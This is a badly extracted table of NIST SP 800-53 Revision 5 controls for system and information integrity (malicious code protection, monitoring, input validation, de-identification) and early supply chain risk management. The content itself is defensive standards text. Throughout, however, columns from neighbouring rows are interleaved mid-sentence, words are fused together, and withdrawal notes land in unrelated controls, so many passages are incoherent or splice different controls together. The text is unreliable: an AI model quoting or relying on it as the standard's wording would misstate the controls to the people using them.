SI-3(8) Malicious Code Protection | Detect Unauthorized Commands (a) Detect the following unauthorized operating system commands through the kernel application Detecting unauthorized commands can be applied to critical interfaces other than kernel-based inte AU-2, AU-6, AU-12.
SI-3(7) Malicious Code Protection | Nonsignature-based Detection programming interface on [Assignment:
[Withdrawn: Incorporated into SI-3.] organization-defined system hardware components]:
[Assignment: organization-defined unauthorized operating system commands]; and
SI-3(10) Malicious Code Protection | Malicious Code Analysis (a) Employ the following tools and techniques to analyze the characteristics and behavior of The use of malicious code analysis tools provides organizations with a more in-depth understanding None.
SI-4 System Monitoring malicious code: [Assignment:
a. Monitor the system to detect: organization-defined tools and techniques]; and of adversary
System tradecraft
monitoring includes(i.e., external
tactics, techniques,
and internaland procedures)
monitoring. and the
External functionality
monitoring and purpose
includes the AC-2, AC-3, AC-4, AC-8, AC-17, AU-2, AU-6, AU-7, AU-9, AU-12, AU-13, AU-14, CA-7, CM-
1. Attacksand andconfigure
indicators of potential attacks in accordance withathe following monitoring of specific instances
observation of events ofoccurring
maliciousatcode. externalUnderstanding
interfaces thethe
to characteristics
system. of malicious
Internal monitoring code
SI-4(1) System Monitoring | System-wide Intrusion Detection System Connect individual intrusion detection tools into system-wide intrusion detection Linking
facilitatesindividual
effective intrusion
organizational detection tools into
responses acurrent
tosystem.system-wide
and future intrusion
threats. detection systemincludes
Organizations provides 3, CM-6, CM-8, CM-11, IA-10, IR-4, MA-3, MA-4, PL-9, PM-12, RA-5, RA-10, SC-5, SC-7, SC-
None.
objectives: [Assignment: organization-defined monitoring objectives]; and
system. the observation
additional coverage of events
and occurring
effective within the
detection capabilities. Organizations
The information monitor systems
contained in by can
one observing 18, SC-26, SC-31, SC-35, SC-36, SC-37, SC-43, SI-3, SI-6, SI-7, SR-9, SR-10.
SI-4(2) System Monitoring | Automated Tools and Mechanisms for Real-time Analysis Employ automated tools and mechanisms to support near real-time analysis of events. Automated
audit activitiestoolsin and
real mechanisms
time or by include host-based,
observing other system network-based,
aspects such astransport-based,
access patterns, orintrusion
storage-bas PM-23, PM-25.
detection tool can be shared widely across the organization, making the system-wide detection
SI-4(3) System Monitoring | Automated Tool and Mechanism Integration Employ automated tools and mechanisms to integrate intrusion detection tools and mechanisms intoUsing automated
capability more robust tools and mechanisms
powerful. to integrate intrusion detection tools and mechanisms into acc
PM-23, PM-25.
SI-4(4) System Monitoring | Inbound and Outbound Communications Traffic (a) Determine criteria for unusual or unauthorized activities or conditions for inbound and Unusual or unauthorized activities or conditions related to system inbound and outbound None.
SI-4(5) System Monitoring | System-generated Alerts outbound communications traffic; communications traffic includes internal traffic that
Alert [Assignment: organization-defined personnel or roles] when the following system-generated i Alerts may be generated from a variety of sources, including audit records or inputs from malicious c AU-4, AU-5, PE-6. indicates the presence of malicious code or
unauthorized use of legitimate code or credentials within organizational systems or propagating
SI-3(9) Malicious Code Protection | Authenticate Remote Commands [Withdrawn: Moved to AC-17(10).] among system components, signaling to external systems, and the unauthorized exporting of
SI-4(7) System Monitoring | Automated Response to Suspicious Events (a) Notify [Assignment: organization-defined incident response personnel (identified by name Least-disruptive actions include initiating requests for human responses. None.
SI-4(6) System Monitoring | Restrict Non-privileged Users and/or by role)] of detected
[Withdrawn: Incorporated into AC-6(10).] suspicious events; and
SI-4(9) System Monitoring | Testing of Monitoring Tools and Mechanisms Test intrusion-monitoring tools and mechanisms [Assignment: organization-defined frequency]. Testing intrusion-monitoring tools and mechanisms is necessary to ensure that the tools and None.
SI-4(10) System Monitoring | Visibility of Encrypted Communications Make provisions so that [Assignment: organization-defined encrypted communications traffic] is mechanisms
Organizationsare operating
balance the needcorrectly and continue
to encrypt to satisfy the
communications monitoring
traffic to protect objectives of
data confidentiality None.
visible tooutbound
[Assignment: organization-defined organizations. Themaintain
frequency and depth of testing
trafficdepends on the types of tools and mechanisms
SI-4(11) System Monitoring | Analyze Communications Traffic Anomalies Analyze communications traffic at system monitoring
the external toolstoand
interfaces themechanisms].
system and selected with the need to
Organization-defined
used by organizations interior visibility
points into such
include subnetworks from aand monitoring
subsystems. perspective.
Anomalies Organizations
within None.
[Assignment: organization-defined interior points within theusing
system] to discoverorganization-
anomalies. determine
organizational whether
systems theand the methods
visibility
include requirement of deployment.
applies to internal encrypted traffic, encrypted traffic
SI-4(12) System Monitoring | Automated Organization-generated Alerts Alert [Assignment: organization-defined personnel or roles] [Assignment: Organizational
intended for personnel
external on thelarge
destinations, system
or
file alert
a
transfers,
subset
long-time
notification
of the
persistent
listtypes.
traffic include system connections, attempts
administrators, to
mission None.
defined automated mechanisms] when the following indications of inappropriate or unusual access
or information
business owners, from
system unexpected
owners, locations,
senior agency the information
use of unusual protocols
security andsenior
officer, ports,agency
the use of
SI-4(13) System Monitoring | Analyze Traffic and Event Patterns (a) Analyze communications traffic and event patterns for the system; Identifying
unmonitored and understanding
network protocols common
(e.g., communications
IPv6 usage during traffic
IPv4 and eventand
transition), patterns
attempted help None.
activities
(b) Develop with security
profiles or privacy implications
representing common traffic occur:
and[Assignment:
event patterns; organization-defined
and activities official for privacy,
organizations provide systemuseful security
informationofficers, to or privacy
system officers.
monitoring Automated
devices to more organization-generated
effectively identify
SI-4(14) System Monitoring | Wireless Intrusion Detection Employ
that a wireless
trigger alerts].intrusion detection system to identify rogue wireless devices and to detect attack alerts Wirelessare signals
the may radiate
security alerts beyond
generated organizational
by organizations facilities.
and Organizations
transmitted usingproactively
automated search for un AC-18, IA-3.
means.
suspicious or anomalous traffic and events when they occur. Such information can help reduce the
SI-4(15) System Monitoring | Wireless to Wireline Communications Employ an intrusion detection system to monitor wireless communications traffic as the traffic passesnumber Wirelessof networks are inherently
false positives and falseless secure than
negatives during wired
systemnetworks.
monitoring. For example, wireless networks areAC-18.
SI-4(16) System Monitoring | Correlate Monitoring Information Correlate information from monitoring tools and mechanisms employed throughout the system. Correlating information from different system monitoring tools and mechanisms can provide a more AU-6. co
SI-4(17) System Monitoring | Integrated Situational Awareness Correlate information from monitoring physical, cyber, and supply chain activities to achieve integra Correlating monitoring information from a more diverse set of information sources helps to achieve inAU-16, PE-6, SR-2, SR-4, SR-6.
SI-4(18) System Monitoring | Analyze Traffic and Covert Exfiltration Analyze outbound communications traffic at external interfaces to the system and at the following Organization-defined interior points include subnetworks and subsystems. Covert means that can None.
SI-4(19) System Monitoring | Risk for Individuals interior points
Implement to detect covert
[Assignment: exfiltration of information:
organization-defined [Assignment:
additional monitoring] organization-defined
of individuals be used to exfiltrate
who have been Indications of increased information
risk fromincludeindividuals steganography.
can be obtained from different sources, including None.
interior points
identified within the system].
SI-4(20) System Monitoring | Privileged Users Implementbythe [Assignment: organization-defined
following additional monitoring of sources]
privilegedas posing an increased level
users: [Assignment: of risk.
organization-definedpersonnel
Privileged usersrecords, have intelligence
access to more agencies, law enforcement
sensitive information,organizations, and other sources.
including security-related information,The t AC-18.
monitoring of individuals is coordinated with the management, legal, security, privacy, and human
SI-4(21) System Monitoring | Probationary Periods Implement the following additional monitoring of individuals during [Assignment: organization-defin During probationary periods, employees do not have
resource officials who conduct such monitoring. Monitoring is conducted in accordance with permanent employment status within organizations.
AC-18.
SI-4(22) System Monitoring | Unauthorized Network Services (a) Detect network services that have not been authorized or approved by [Assignment: Unauthorized or unapproved network services include services in service-oriented architectures that CM-7. la
SI-4(23) System Monitoring | Host-based Devices organization-defined authorization or approval processes]; and
Implement the following host-based monitoring mechanisms at [Assignment: organization-defined s Host-based monitoring collects information about the host (or system in which it resides). System AC-18, AC-19.
SI-4(24) System Monitoring | Indicators of Compromise Discover, collect, and distribute to [Assignment: organization-defined personnel or roles], indicato Indicators of compromise (IOC) are forensic artifacts from intrusions that are identified on organi AC-18.
SI-4(25) System Monitoring | Optimize Network Traffic Analysis Provide visibility into network traffic at external and key internal system interfaces to optimize the Encrypted traffic, asymmetric routing architectures, capacity and latency limitations, and None.
SI-5 Security Alerts, Advisories, and Directives effectiveness
a. Receive system of monitoring devices.
security alerts, advisories, and directives from [Assignment: organization-defined transitioning The Cybersecurity from and olderInfrastructure
to newer technologies Security Agency (e.g., IPv4 (CISA) to generates
IPv6 network protocol
security alertstransition)
and advisoriesmay PM-15, RA-5, SI-2.
external organizations] result in blind spots for organizations when analyzing network traffic. Collecting, decrypting, pre-
SI-5(1) Security Alerts, Advisories, and Directives | Automated Alerts and Advisories Broadcast security alerton andanadvisory
ongoinginformation
basis; throughout the organization using [Assignment: The significant
processing, andnumber
distributing of changes to organizational
only relevant systems and
traffic to monitoring environments
devices can streamline of operation
the efficiency None.
SI-6 Security and Privacy Function Verification organization-defined
a. Verify the correct operation automated of mechanisms].
[Assignment: organization-defined security and privacy functions]; requires Transitional the states
dissemination
for systems of security-related
include system information startup, restart, to a shutdown,
variety of organizational
and abort. System entities that CA-7, CM-4, CM-6, SI-7.
notificati
SI-4(8) System Monitoring | Protection of Monitoring Information b. Perform the
[Withdrawn: verification into
Incorporated of the functions specified in SI-6a [Selection (one or more): [Assignment: have a direct interest in the success of organizational mission and business functions. Based on
SI-4.]
organization-defined system transitional states]; upon command by user with appropriate privilege; information provided by security alerts and advisories, changes may be required at one or more of
SI-6(2) Security and Privacy Function Verification | Automation Support for Distributed Testing Implement automated
[Assignment: mechanismsfrequency]];
organization-defined to support the management of distributed security and privacy fun The use of automated mechanisms to support the management of distributed function testing helps to SI-2.
e
SI-6(3) Security and Privacy Function Verification | Report Verification Results Report the results of security and privacy function verification to [Assignment: organization-defined pOrganizational personnel with potential interest in the results of the verification of security and privaSI-4, SR-4, SR-5.
SI-7 Software, Firmware, and Information Integrity a. Employ integrity verification tools to detect unauthorized changes to the following software, Unauthorized changes to software, firmware, and information can occur due to errors or malicious act AC-4, CM-3, CM-7, CM-8, MA-3, MA-4, RA-5, SA-8, SA-9, SA-10, SC-8, SC-12, SC-13, SC-28,
SI-7(1) Software, Firmware, and Information Integrity | Integrity Checks firmware,
Perform anand information:
integrity check of[Assignment:
[Assignment: organization-defined
organization-defined software,
software, firmware,
firmware,andand Security-relevant events include the identification of new threats to which organizational systems SC-37, None. SI-3, SR-3, SR-4, SR-5, SR-6, SR-9, SR-10, SR-11.
information];[Selection
information] and
SI-7(2) Software, Firmware, and Information Integrity | Automated Notifications of Integrity Violations Employ automated tools(one thatorprovide
more):notification
at startup; at to [Assignment:
[Assignment: organization-defined
organization-defined transitional are susceptible
personnel The employment andof the installation
automated tools ofto new hardware,
report systemsoftware,
and information or firmware. integrityTransitional
violationsstatesand to None.
states
or or security-relevant
roles]centrally
upon discovering events]; [Assignment: organization-defined frequency]]. include system startup, restart, shutdown, and abort.
SI-7(3) Software, Firmware, and Information Integrity | Centrally Managed Integrity Tools Employ managed discrepancies during tools.
integrity verification integrity verification. notify
Centrallyorganizational
managed integrity personnel in a timely
verification matter
tools provides is essential
greatertoconsistency
effective risk response.
in the applicationPersonnel
of such AU-3, SI-2, SI-8.
with an interest in system and information integrity violations include mission and business owners,
SI-6(1) Security and Privacy Function Verification | Notification of Failed Security Tests [Withdrawn: Incorporated into SI-6.] system owners, senior agency information security official, senior agency official for privacy, system
SI-7(5) Software, Firmware, and Information Integrity | Automated Response to Integrity Violations Automatically [Selection (one or more): shut the system down; restart the system; implement Organizations may define different integrity-checking responses by type of information, specific None.
SI-7(6) Software, Firmware, and Information Integrity | Cryptographic Protection [Assignment: organization-defined
Implement cryptographic mechanisms controls]] when
to detect integrity violations
unauthorized changesare discovered.
to software, firmware, and in information,
Cryptographicormechanisms
a combination usedof toboth. Types
protect of information
integrity includesignatures
include digital firmware,and software, and user aSC-12, SC-13.
the computation
data. Specific information includes boot firmware for certain types of machines. The automatic
SI-7(7) Software, Firmware, and Information Integrity | Integration of Detection and Response Incorporate the detection of the following unauthorized changes into the organizational incident res implementation Integrating detection and response
of controls helps to ensure
within organizational that detected
systems includesevents reversing are thetracked, monitored,
changes, halting correcAU-2, AU-6, IR-4, IR-5, SI-4.
SI-7(8) Software, Firmware, and Information Integrity | Auditing Capability for Significant Events Upon detection of a potential integrity violation, provide the capability to audit the event and initia Organizations select response actions based on types of software, specific software, or information for AU-2, AU-6, AU-12.
SI-7(9) Software, Firmware, and Information Integrity | Verify Boot Process Verify the integrity of the boot process of the following system components: [Assignment: organiza Ensuring the integrity of boot processes is critical to starting system components in known, trustworthy SI-6.
states. Integrity verification mechanisms provide a level of assurance that only trusted code is execute
SI-7(10) Software, Firmware, and Information Integrity | Protection of Boot Firmware Implement the following mechanisms to protect the integrity of boot firmware in [Assignment: orga Unauthorized modifications to boot firmware may indicate a sophisticated, targeted attack. These typSI-6.
SI-7(11) Software, Firmware, and Information Integrity | Confined Environments with Limited Privileges [Withdrawn: Moved to CM-7(6).]
SI-7(12) Software, Firmware, and Information Integrity | Integrity Verification Require that the integrity of the following user-installed software be verified prior to execution: [As Organizations verify the integrity of user-installed software prior to execution to reduce the likelih CM-11.
SI-7(13) Software, Firmware, and Information Integrity | Code Execution in Protected Environments [Withdrawn: Moved to CM-7(7).]
SI-7(14) Software, Firmware, and Information Integrity | Binary or Machine Executable Code [Withdrawn: Moved to CM-7(8).]
SI-7(15) Software, Firmware, and Information Integrity | Code Authentication Implement cryptographic mechanisms to authenticate the following software or firmware components Cryptographic authentication includes verifying that software or firmware components have been digiCM-5, SC-12, SC-13.
SI-7(16) Software, Firmware, and Information Integrity | Time Limit on Process Execution Without Prohibit processes from executing without supervision for more than [Assignment: organization- Placing a time limit on process execution without supervision is intended to apply to processes for None.
SI-7(17) Supervision
Software, Firmware, and Information Integrity | Runtime Application Self-protection defined
Implement [Assignment: organization-defined controls] for application self-protection at runtime. which
time period]. Runtime typical or normal
application execution periods
self-protection employs canruntime
be determinedinstrumentation and situationsto detect in which organizations
and block the exploitation
SI-16. of software vulnerabilities by taking advantage of information from the software in execution. Runti
exceed such periods. Supervision includes timers on operating systems, automated responses, and
SI-8 Spam Protection a. Employ spam protection mechanisms at system entry and exit points to detect and act on System entry
manual oversightand andexit points
response include
whenfirewalls, remote-access
system process anomalies servers,
occur.electronic mail servers, web PL-9, SC-5, SC-7, SC-38, SI-3, SI-4.
SI-7(4) Software, Firmware, and Information Integrity | Tamper-evident Packaging unsolicited messages; and
[Withdrawn: Incorporated into SR-9.]
SI-8(2) Spam Protection | Automatic Updates Automatically update spam protection mechanisms [Assignment: organization-defined frequency]. Using automated mechanisms to update spam protection mechanisms helps to ensure that updates None.
SI-8(3) Spam Protection | Continuous Learning Capability Implement spam protection mechanisms with a learning capability to more effectively identify occur on mechanisms
Learning a regular basis and provide
include Bayesian thefilters
latestthatcontent respond and to protection
user inputs capabilities.
that identify specific None.
SI-8(1) Spam Protection | Central Management legitimate
[Withdrawn: communications
Incorporated into traffic.
PL-9.] traffic as spam or legitimate by updating algorithm parameters and thereby more accurately
separating types of traffic.
SI-10 Information Input Validation Check the validity of the following information inputs: [Assignment: organization-defined Checking the valid syntax and semantics of system inputs—including character set, length, None.
SI-10(1) Information Input Validation | Manual Override Capability information
(a) Provide ainputsmanual tooverride
the system].
capability for input validation of the following information inputs: numerical range, andsuch
In certain situations, acceptable
as during values—verifies
events that are that inputsinmatch
defined specified
contingency definitions
plans, a manual foroverride
format AC-3, AU-2, AU-12.
[Assignment: organization-defined inputs defined in the base control (SI-10)]; and content. For example, if the organization specifies that numerical values between 1-100 are the
SI-10(2) Information Input Validation | Review and Resolve Errors Review and resolve input validation errors within [Assignment: organization-defined time period]. Resolution only acceptable of inputinputsvalidation
for a field errors
in aincludes correctinginputs
given application, systemic causes
of 387, abc, oforerrors
%K%and are resubmitting
invalid inputs None.
SI-10(3) Information Input Validation | Predictable Behavior Verify that the system behaves in a predictable and documented manner when invalid inputs are transactions
A with corrected
common vulnerability input. Input validation
in organizational systems iserrors are thosebehavior
unpredictable related towhen the information
invalid inputs are None.
received. inputs defined by the of organization in the basehelps control (SI-10).
SI-10(4) Information Input Validation | Timing Interactions Account for timing interactions among system components in determining appropriate responses received. In addressing Verification
invalid system system inputspredictability
received across protocol ensure that the system
interfaces, timingbehaves as expected
interactions become None.
for invalid when invalid inputs are received. This occurs by specifying system responses that allow theprotocols
system
SI-10(5) Information Input Validation | Restrict Inputs to Trusted Sources and Approved Formats Restrict theinputs.
use of information inputs to [Assignment: organization-defined trusted sources] and/or relevant, Restricting
to the
transition
where
the
touse
oneofprotocol
known inputs
states
needs
towithout
trusted to sources
considerand
adverse,
the inimpact
unintended trusted of formats
the errorappliesresponse theon other
concept of authori AC-3, AC-6.
in protocol stack. For example, 802.11 standard wirelessside effects.
network The invalid
protocols inputs
do not are
interact those
well
SI-10(6) Information Input Validation | Injection Prevention Prevent untrusted data injections. Untrusted
with data injections
Transmission Controlmay be prevented
Protocols (TCP) when using a parameterized
packets are dropped interface
(which or output
could be due escaping (outpu
to invalid AC-3, AC-6.
SI-11 Error Handling a. Generate error messages that provide information necessary for corrective actions without Organizations consider the structure and content of error messages. The extent to which systems canAU-2, AU-3, SC-31, SI-2, SI-15.
SI-12 Information Management and Retention revealing
Manage and information that couldwithin
retain information be exploited; andand information output from the system in accordance
the system Information management and retention requirements cover the full life cycle of information, in someAC-16, AU-5, AU-11, CA-2, CA-3, CA-5, CA-6, CA-7, CA-9, CM-5, CM-9, CP-2, IR-8, MP-2,
SI-12(1) Information Management and Retention | Limit Personally Identifiable Information Elements Limit personally identifiable information being processed in the information life cycle to the followi Limiting the use of personally identifiable information throughout the information life cycle when thePM-25. MP-3, MP-4, MP-6, PL-2, PL-4, PM-4, PM-8, PM-9, PS-2, PS-6, PT-2, PT-3, RA-2, RA-3, SA-
5, SA-8, SR-2.
SI-12(2) Information Management and Retention | Minimize Personally Identifiable Information in Testing, TrUse the following techniques to minimize the use of personally identifiable information for research, Organizations can minimize the risk to an individual’s privacy by employing techniques such as de-iden PM-22, PM-25, SI-19.
SI-12(3) Information Management and Retention | Information Disposal Use the following techniques to dispose of, destroy, or erase information following the retention Organizations can minimize both security and privacy risks by disposing of information when it is no None.
SI-13 Predictable Failure Prevention period: [Assignment: organization-defined techniques].
a. Determine mean time to failure (MTTF) for the following system components in specific longer needed. The disposal or destruction of information applies to originals as well as
While MTTF is primarily a reliability issue, predictable failure prevention is intended to address pot CP-2, CP-10, CP-13, MA-2, MA-6, SA-8, SC-6. copies and
environments of operation: [Assignment: organization-defined system components]; and archived records, including system logs that may contain personally identifiable information.

13 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

SI-13(1) Predictable Failure Prevention | Transferring Component Responsibilities Take system components out of service by transferring component responsibilities to substitute Transferring primary system component responsibilities to other substitute components prior to None.
SI-9 Information Input Restrictions components
[Withdrawn: no later than [Assignment:
Incorporated into AC-2, AC-3, organization-defined
AC-5, and AC-6.] fraction or percentage] of mean time primary component failure is important to reduce the risk of degraded or debilitated mission or
to failure. business functions. Making such transfers based on a percentage of mean time to failure allows
SI-13(3) Predictable Failure Prevention | Manual Transfer Between Components Manually initiate transfers between active and standby system components when the use of the For example, iftothe
organizations be MTTF
proactive for abased
system oncomponent is 100 days
their risk tolerance. and thethe
However, MTTF percentage
premature defined byof None.
replacement
SI-13(4) Predictable Failure Prevention | Standby Component Installation and Notification active
If systemcomponent
component reaches
failures[Assignment:
are detected: organization-defined percentage] of the mean time to the organization
Automatic or manual is 90 transfer
percent,of the manual transfer
components would occur
from standby aftermode
to active 90 days. can occur upon the None.
failure.
(a) Ensure that the real-time;
standby components are successfully
SI-13(5) Predictable Failure Prevention | Failover Capability Provide [Selection: near real-time] [Assignment:and transparently installed
organization-defined within
failover capability] f detection
Failover refersof component
to the automatic failures.switchover to an alternate system upon the failure of the primary sysCP-6, CP-7, CP-9.
[Assignment: organization-defined time period]; and
SI-14 Non-persistence Implement non-persistent [Assignment: organization-defined system components and services] that are Implementation of non-persistent components and services mitigates risk from advanced persistent SC-30, SC-34, SI-21.
SI-14(1) Non-persistence | Refresh from Trusted Sources Obtain software and data employed during system component and service refreshes from the threats
Trusted (APTs)
sourcesbyincludereducing the targeting
software and data capability of adversaries
from write-once, read-only(i.e., window
media oroffrom opportunity
selectedand None.
following trusted sources: [Assignment: organization-defined trusted sources]. available
offline secureattack surface)
storage to initiate and complete attacks. By implementing the concept of non-
facilities.
SI-14(2) Non-persistence | Non-persistent Information (a) [Selection: Refresh [Assignment: organization-defined information][Assignment: organization- Retaining
persistence information
for selected longer
system than is needed makes
components, the information
organizations can provide a potential
a trusted, target
known for state
advanced None.
SI-14(3) Non-persistence | Non-persistent Connectivity defined frequency]; Generate [Assignment: organization-defined information]
Establish connections to the system on demand and terminate connections after [Selection: completio on demand]; and adversaries searching for high value assets to compromise through
Persistent connections to systems can provide advanced adversaries with paths to move laterally throu unauthorized disclosure, SC-10.
unauthorized modification, or exfiltration. For system-related information, unnecessary retention
SI-15 Information Output Filtering Validate information output from the following software programs and/or applications to ensure thatprovides Certain types of attacks,
advanced including
adversaries SQL injections,
information that can produce
assist output
in theirresults that are unexpected
reconnaissance and lateral or in SI-3, SI-4, SI-11.
SI-16 Memory Protection Implement the following controls to protect the system memory from unauthorized code execution: [Some adversaries launch attacks with the intent of executing code in non-executable regions of me AC-25, SC-3, SI-7.
SI-17 Fail-safe Procedures Implement the indicated fail-safe procedures when the indicated failures occur: [Assignment: organizat Failure conditions include the loss of communications among critical system components or betweenCP-12, sy CP-13, SC-24, SI-13.
SI-18 Personally Identifiable Information Quality Operations a. Check the accuracy, relevance, timeliness, and completeness of personally identifiable Personally identifiable information quality operations include the steps that organizations take to c PM-22, PM-24, PT-2, SI-4.
SI-18(1) Personally Identifiable Information Quality Operations | Automation Support information
Correct or deleteacrosspersonally
the information life cycle
identifiable [Assignment:
information that isorganization-defined
inaccurate or outdated, frequency]; andde The use of automated mechanisms to improve data quality may inadvertently create privacy risks. PM-18, RA-8.
incorrectly
SI-18(2) Personally Identifiable Information Quality Operations | Data Tags Employ data tags to automate the correction or deletion of personally identifiable information acrossAutomated Data taggingtools may connect
personally to external
identifiable informationor otherwise
includesunrelated
tags thatsystems, and the permissions,
note processing matching of author AC-3, AC-16, SC-16.
records between these systems may create linkages with unintended consequences. Organizations
SI-18(3) Personally Identifiable Information Quality Operations | Collection Collect personally identifiable information directly from the individual. Individuals or their designated
assess and document these risks representatives
in their privacycan be sources
impact assessments of correct andpersonally identifiable that None.
make determinations
SI-18(4) Personally Identifiable Information Quality Operations | Individual Requests information. Organizations consider contextual
Correct or delete personally identifiable information upon request by individuals or their designated Inaccurate personally identifiable information maintained by organizations may cause problems factors that may incentivize individuals to providefor None.
representatives. correct data
individuals, versus
especially false data. Additional
in thoseinformation
business functions steps may be
where necessary to validate collected information
SI-18(5) Personally Identifiable Information Quality Operations | Notice of Correction or Deletion Notify [Assignment: organization-defined recipients of personally identifiable information] and When
based on personally
the nature identifiable
andorcontext of the is corrected or inaccurate
deleted, informationtake
organizations may steps
resulttoinensure None.
individuals thatfollowing
the personally identifiable information has been corrected or deleted. inappropriate
that all authorized decisions theofdenial of personally
benefits and identifiable
services toinformation,
individuals. how itcorrect
Eventhe is to be used, and
SI-19 De-identification a. Remove the elements of personally identifiable information from datasets: De-identification
information, is recipients
the circumstances,
general such for
term information,
thecause
process and of the individual
removing the with whom
association betweeninformation
a set ofisideMP-6, PM-22, PM-23, PM-24, RA-2, SI-12.
[Assignment: organization-defined elements of personally identifiable information]; and associated orintheir certaindesignated can
representatives, problems
are informed forofindividuals
the corrected that or outweigh
deletedthe
SI-19(1) De-identification | Collection De-identify the dataset upon collection by not collecting personally identifiable information. If a data source contains personally identifiable information but the information will not be used,
information. None.
SI-19(2) De-identification | Archiving Prohibit archiving of personally identifiable information elements if those elements in a dataset will Datasets the dataset cancan be be de-identified
archived for many when it is created
reasons. by not collecting
The envisioned purposesthe fordata elementsdataset
the archived that contain
are None.
not be needed afteridentifiable
the datasetinformation
is archived. elements from a dataset prior to its release if those the personally
specified, and ifidentifiable
personally information.
identifiable For example,
information if an organization
elements are not uses does notthe
required, intend
elements to useare thenot
SI-19(3) De-identification | Release Remove personally Prior
social to releasing
security numbera dataset,
of an aapplicant,
data custodian then considers
application the
forms intended
do not ask of the
for a dataset
social and
security None.
elements in theencrypt,
dataset do notorneed to bedirect
part identifiers
of the datainrelease. archived. Forif example,
determines it ispossible
necessarysocialtosecurity
release numbers may have beeninformation.
collected forIf record linkage, but the
SI-19(4) De-identification | Removal, Masking, Encryption, Hashing, or Replacement of Direct Identifiers Remove, mask, hash, replace a dataset. There
archived aredataset
many may include processes for personally
removing identifiable
direct identifiers from the personally
a dataset. Columns
case, itinis anot dataseSC-12, SC-13.
identifiable information is not the required
necessary, theelements
information from the be
can linked
removedrecords. usingIn this
de-identification
SI-19(5) De-identification | Statistical Disclosure Control Manipulate numerical data, contingency tables, and statistical findings so that no individual or Many types of statistical analyses can result in the disclosure of information about individuals even None.
techniques.
SI-19(6) De-identification | Differential Privacy organization is identifiable
Prevent disclosure in theidentifiable
of personally results of the analysis. by adding non-deterministic noise to the re if
information Theonly summary information
mathematical definition for is provided.
differential Forprivacy
example, holdsif athat
school thethat
result publishes
of a dataset a monthly
analysis table
should SC-12, SC-13.
with the number of minority students enrolled, reports that it has 10-19 such students in January,
SI-19(7) De-identification | Validated Algorithms and Software Perform de-identification using validated algorithms and software that is validated to implement Algorithms
and subsequently that appear reports to that
remove it has personally
20-29 such identifiable
students information
in March, then from a dataset
it can may in
be inferred factthe None.
that
SI-19(8) De-identification | Motivated Intruder the algorithms.
Perform a motivated intruder test on the de-identified dataset to determine if the identified data leave information that is personally identifiable or data that is
A motivated intruder test is a test in which an individual or group takes a data release and specified re-identifiable. Software that is None.
remains or ifor
thecapabilities
de-identified data can be re-identified. claimed toand implement a to
validated algorithm ormaymorecontain bugs in ortheimplement a different algorithm.
SI-20 Tainting Embed data in the following systems or system components to determine if organizat resources Many cyber-attacks
Software maythe
attempts
de-identifytarget re-identify
organizational
one typeknowledge,
oneinformation,
of data, such
individuals
or information
as integers, but
de-identified dataset.
that the organization
not de-identify
Such
holds
of on be AU-13.
tests specify amount of inside computational resources, financialanother
resources, type data,
SI-21 Information Refresh Refresh [Assignment: organization-defined information] at [Assignment: organization-defined frequ and Retaining information
skills that intrudersfor longerto
possess than it is needed
conduct the tests. makes it an increasingly
A motivated intrudervaluable
test can and enticingif tar
determine the SI-14.
SI-22 Information Diversity a. Identify the following alternative sources of information for [Assignment: organization-defined Actions taken by a system service or a function are often driven by the information it receives. None.
SI-23 Information Fragmentation essential
Based on functions
[Assignment: and organization-defined
services]: [Assignment: organization-defined alternative information
circumstances]: Corruption,
One objective fabrication,
of the advanced modification,
persistent or deletion
threat isoftothat information
exfiltrate valuable could impact theOnce
information. ability of the None.
sources];
a. Develop,
Fragment andthe following information: [Assignment: organization-defined information]; and service function tois properly
generallycarry outfor its intended actions.toByrecover having the multiple sources of input, the
SR-1 Policy and Procedures a. document, and disseminate to [Assignment: organization-defined personnel or roles]: exfiltrated, Supply chain
service or
there
risk management
function can continue
nopolicy
way
operationandthe if
organization
procedures
one source address
is the controls
corrupted or
lostininformation.
no the SR
longer familyTherefore,
available. asItwell
is as sPM-9, PM-30, PS-8, SI-12.
SR-2 Supply Chain Risk Management Plan 1. [Selectiona (one
a. Develop plan foror more):
managing Organization-level;
supply chain risks Mission/business
associated withprocess-level;
the research andSystem-level] supply organizations
development, The dependence
may consider dividing the information into disparate elements and distributing those
on products, systems, and services from and external providers,
chain management policy that: delivery, integration, operations and maintenance, and disposal elements across multiple systems or system components locations. Such as well as
actions willthe nature CA-2, CP-4, IR-4, MA-2, MA-6, PE-16, PL-2, PM-9, PM-30, RA-3, RA-7, SA-8, SI-4.
increase
SR-2(1) Supply Chain Risk Management Plan | Establish SCRM Team design,risk
Establish manufacturing,
a supply chainacquisition,
risk management team consisting of [Assignment: organization-defined of the
To relationships
implement supplywith chain those
riskproviders,
management present
plans, anorganizations
increasing level of risk atocoordinated,
establish an organization. team- None.
of the following
personnel, roles, systems,
and system components
responsibilities] to lead or system
and support services:
the [Assignment:
following SCRM organization-
activities: Threatapproach
based actions that may increase
to identify security
andorganizations,
assess or privacy
supply risksand
chain risks includemanage unauthorized
these production, the
SR-3 Supply Chain Controls and Processes a. Establish
defined a process
systems, or processes
system components, to identify
or systemandservices];
address weaknesses or deficiencies in the supply insertion Supply chain elements
or use include
of counterfeits, tampering, entities,
theft, or tools
insertion employed
of malicious forrisks
software
by using and
the research
and hardware, devel CA-2, MA-2, MA-6, PE-3, PE-16, PL-8, PM-30, SA-2, SA-3, SA-4, SA-5, SA-8, SA-9, SA-10,
[Assignment:
chain elements organization-defined supply chain risk management activities]. programmatic and technical mitigation techniques. The team approach enables organizations to and SA-15, SC-7, SC-29, SC-30, SC-38, SI-7, SR-6, SR-9, SR-11.
SR-3(1) Supply Chain Controls and Processes | Diverse Supply Base Employ a diverseand setprocesses
of sourcesoffor [Assignment:
the following organization-defined
system componentssystem or system
and services: component] Diversifying the supply of systems, system components, and services can reduce the probability
[Assignment: conduct an analysis of their supply chain, communicate with internal and external partners or None.
in coordination with [Assignment:
organization-defined organization-defined supply chain personnel];
SR-3(2) Supply Chain Controls and Processes | Limitation of Harm Employ the following system
controlscomponents
to limit harm and services].
from potential adversaries identifying and targeting the Controls that adversaries
that canwill be successfully
implemented identify
to reduce andthe target the supply
probability chain and can
of adversaries reduce theidentifying
successfully impact of None.
organizational supply chain: [Assignment: organization-defined controls]. a supply
and chainthe
targeting event or compromise.
supply chain include Identifying
avoiding multiple
the purchase suppliers
of customfor replacement
or components
non-standardized
SR-3(3) Supply Chain Controls and Processes | Sub-tier Flow Down Ensure that the controls included in the contracts of prime contractors are also included in the contr can To manage
reduce the supply chain risk
probability effectively
that the replacementand holistically,
component it is important
will become thatunavailable.
